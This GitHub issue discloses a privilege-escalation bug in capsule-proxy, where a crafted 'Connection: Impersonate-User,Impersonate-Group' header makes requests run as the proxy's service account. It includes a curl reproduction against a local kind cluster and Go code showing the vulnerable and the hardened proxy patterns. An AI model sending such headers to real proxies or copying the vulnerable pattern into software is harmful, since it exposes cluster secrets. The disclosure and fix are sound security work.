Privilege escalation vulnerability via malicious "Connection" header #188

Closed
prometherion opened this issue Feb 18, 2022 · 1 comment · Fixed by #189
A user crafting an API request directed at capsule-proxy can get a privilege escalation using the Service Account of the proxy itself.

This is done by passing the Impersonate-User or Impersonate-Group header in the Connection header, using the same exploit described here: GHSA-pvxj-25m6-7vqr

At this point, instead of impersonating the user and their permissions, the request will act as if it was from the Rancher management server Capsule Proxy and incorrectly return the information.

@prometherion prometherion added the bug Something isn't working label Feb 18, 2022
@prometherion prometherion self-assigned this Feb 18, 2022

prometherion commented Feb 18, 2022

Steps on how to reproduce

```shell
kind create cluster --name capsule --wait 60s
helm upgrade --install capsule clastix/capsule -n capsule-system --create-namespace
mkcert 127.0.0.1 && kubectl --namespace capsule-system create secret tls capsule-proxy --key=./127.0.0.1-key.pem --cert ./127.0.0.1.pem
helm upgrade --install capsule-proxy clastix/capsule-proxy -n capsule-system --create-namespace
kubectl -n capsule-system port-forward svc/capsule-proxy 9001
export TOKEN=$(any valid token)

curl --cacert /home/prometherion/.local/share/mkcert/rootCA.pem "https://localhost:9001/api/v1/secrets" -H "Authorization: Bearer $TOKEN" -H "Connection: Impersonate-User,Impersonate-Group" -0
```

Many kudos to @carpenterm and @enj for pointing this out! 🙏🏻

A review for the proposed PR would be great, along with the direct maintainers, such as @bsctl and @MaxFedotov!

@prometherion prometherion added this to the v0.2.1 milestone Feb 18, 2022
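The header-stripping behaviour behind this report, and a mitigation, as an added Go example that is not capsule-proxy's own code: Go's `httputil.ReverseProxy` removes every header named in the inbound `Connection` header after `Director` returns, so the impersonation header the proxy adds is silently dropped and the upstream sees the proxy's own identity. The upstream stand-in, the user name `alice` and the request path are constructed for the example.

```go
package main

import (
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
)

// Constructed stand-in for the API server: echoes the Impersonate-User it received
// (an empty body means the request arrived carrying only the proxy's own identity).
func newUpstream() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte(r.Header.Get("Impersonate-User")))
	}))
}

// Vulnerable pattern: ReverseProxy strips every header named in the inbound Connection
// header *after* Director returns, so a client can erase what the proxy just added.
func vulnerableProxy(target *url.URL, user string) *httputil.ReverseProxy {
	return &httputil.ReverseProxy{Director: func(r *http.Request) {
		r.URL.Scheme, r.URL.Host = target.Scheme, target.Host
		r.Header.Set("Impersonate-User", user)
	}}
}

// Hardened: apply hop-by-hop semantics to the inbound request first, then add trusted headers.
func hardenedProxy(target *url.URL, user string) *httputil.ReverseProxy {
	return &httputil.ReverseProxy{Director: func(r *http.Request) {
		for _, v := range r.Header.Values("Connection") {
			for _, name := range strings.Split(v, ",") {
				r.Header.Del(strings.TrimSpace(name))
			}
		}
		r.Header.Del("Connection")
		r.URL.Scheme, r.URL.Host = target.Scheme, target.Host
		r.Header.Set("Impersonate-User", user)
	}}
}

// upstreamView sends GET /api/v1/secrets with the given Connection header through proxy.
func upstreamView(proxy http.Handler, connection string) string {
	req := httptest.NewRequest(http.MethodGet, "/api/v1/secrets", nil)
	req.Header.Set("Connection", connection)
	rec := httptest.NewRecorder()
	proxy.ServeHTTP(rec, req)
	body, _ := io.ReadAll(rec.Result().Body)
	return string(body)
}
```

With the vulnerable proxy, `upstreamView(..., "Impersonate-User,Impersonate-Group")` returns an empty string; the hardened proxy returns `alice` for the same request.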